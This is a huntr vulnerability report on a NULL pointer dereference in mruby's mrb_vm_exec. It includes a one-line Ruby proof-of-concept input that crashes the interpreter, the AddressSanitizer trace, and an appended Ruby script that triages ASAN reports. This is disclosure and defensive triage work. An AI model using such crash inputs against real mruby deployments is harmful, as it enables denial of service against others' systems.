NULL Pointer Dereference in mrb_vm_exec with super

huntr report 6F930ADD-C9D8-4870-AE56-D4BD8354703B by alexhycheung, Mar 31, 2022, 4:41 p.m. (www.huntr.dev)

Tags: null pointer dereference, mrb_vm_exec, super, addresssanitizer, segv, bugbounty

EPSS: 0 (percentile 12.8%)

Description

NULL Pointer Dereference in mrb_vm_exec with super

Proof of Concept

# 1.rb
o13 = Comparable.initialize(){||0x7f.instance_eval() do super rescue caller (0…1).sort_by() do break end end }

# Run with an AddressSanitizer-instrumented mruby build:
./mruby 1.rb

# Result
ASAN:DEADLYSIGNAL

==19163==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x55bde3b4162d bp 0x7ffcbe8d7ab0 sp 0x7ffcbe8d63c0 T0)
==19163==The signal is caused by a READ memory access.
==19163==Hint: address points to the zero page.
#0 0x55bde3b4162c in mrb_vm_exec /home/xxx/mruby/src/vm.c:1752
#1 0x55bde3b31512 in mrb_vm_run /home/xxx/mruby/src/vm.c:1131
#2 0x55bde3b7b219 in mrb_run /home/xxx/mruby/src/vm.c:3034
#3 0x55bde3b2fbc9 in mrb_yield_with_class /home/xxx/mruby/src/vm.c:879
#4 0x55bde3b0b521 in mrb_mod_initialize /home/xxx/mruby/src/class.c:1648
#5 0x55bde3b3fb19 in mrb_vm_exec /home/xxx/mruby/src/vm.c:1640
#6 0x55bde3b31512 in mrb_vm_run /home/xxx/mruby/src/vm.c:1131
#7 0x55bde3b7b42b in mrb_top_run /home/xxx/mruby/src/vm.c:3047
#8 0x55bde3bedb2a in mrb_load_exec mrbgems/mruby-compiler/core/parse.y:6890
#9 0x55bde3bede42 in mrb_load_detect_file_cxt mrbgems/mruby-compiler/core/parse.y:6933
#10 0x55bde3afc128 in main /home/xxx/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:357
#11 0x7f98eb47ec86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
#12 0x55bde3af9339 in _start (/home/xxx/mruby/bin/mruby+0xc2339)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/xxx/mruby/src/vm.c:1752 in mrb_vm_exec
==19163==ABORTING
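As an added triage example (not part of the original huntr report and not mruby project code): a small Ruby parser that classifies an AddressSanitizer SEGV report like the one above, treating a fault address that lies inside the first page as a NULL pointer dereference at a small struct offset. The embedded log is constructed from the report's own lines; the 4096-byte page size used by the heuristic is an assumption.

```ruby
# Added example: triage an AddressSanitizer SEGV report.
# The log below is constructed from the lines of the huntr report above.
ASAN_REPORT = <<~'LOG'
  ASAN:DEADLYSIGNAL
  ==19163==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x55bde3b4162d bp 0x7ffcbe8d7ab0 sp 0x7ffcbe8d63c0 T0)
  ==19163==The signal is caused by a READ memory access.
  ==19163==Hint: address points to the zero page.
  #0 0x55bde3b4162c in mrb_vm_exec /home/xxx/mruby/src/vm.c:1752
  #1 0x55bde3b31512 in mrb_vm_run /home/xxx/mruby/src/vm.c:1131
  #2 0x55bde3b7b219 in mrb_run /home/xxx/mruby/src/vm.c:3034
  SUMMARY: AddressSanitizer: SEGV /home/xxx/mruby/src/vm.c:1752 in mrb_vm_exec
LOG

# One stack frame from the ASAN backtrace.
Frame = Struct.new(:index, :pc, :function, :location)

# Pull the crash kind, faulting address, access type, frames and summary
# out of an ASAN report. Lines that do not match are ignored.
def parse_asan_report(text)
  result = { kind: nil, address: nil, access: nil, frames: [], summary: nil }
  text.each_line do |raw|
    line = raw.strip
    if (m = line.match(/ERROR: AddressSanitizer: (\S+) on (?:unknown )?address 0x([0-9a-f]+)/))
      result[:kind] = m[1]
      result[:address] = m[2].to_i(16)
    elsif (m = line.match(/signal is caused by a (READ|WRITE) memory access/))
      result[:access] = m[1]
    elsif (m = line.match(/\A#(\d+) 0x([0-9a-f]+) in (\S+) (\S+)/))
      result[:frames] << Frame.new(m[1].to_i, m[2].to_i(16), m[3], m[4])
    elsif (m = line.match(/\ASUMMARY: AddressSanitizer: (.*)/))
      result[:summary] = m[1]
    end
  end
  result
end

# Heuristic: a SEGV whose fault address falls inside the first page is, in
# practice, a NULL pointer dereference (NULL plus a small field offset).
# The 4096-byte page size is an assumption for this example.
def null_deref?(report, page_size = 4096)
  report[:kind] == "SEGV" && !report[:address].nil? && report[:address] < page_size
end

# Produce a one-line triage verdict naming the top frame.
def classify(report)
  return "not a SEGV" unless report[:kind] == "SEGV"
  top = report[:frames].first
  where = top ? "#{top.function} (#{top.location})" : "unknown frame"
  if null_deref?(report)
    "NULL pointer dereference (#{report[:access]} at offset #{report[:address]}) in #{where}"
  else
    "SEGV (#{report[:access]}) at 0x#{report[:address].to_s(16)} in #{where}"
  end
end

if __FILE__ == $PROGRAM_NAME
  puts classify(parse_asan_report(ASAN_REPORT))
end
```

Run on the report above this yields a verdict of a READ at offset 16 in mrb_vm_exec, which is what a fuzzing pipeline would want before deciding whether a crash is a plain NULL dereference (denial of service) or a SEGV at a controlled address that warrants closer review.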
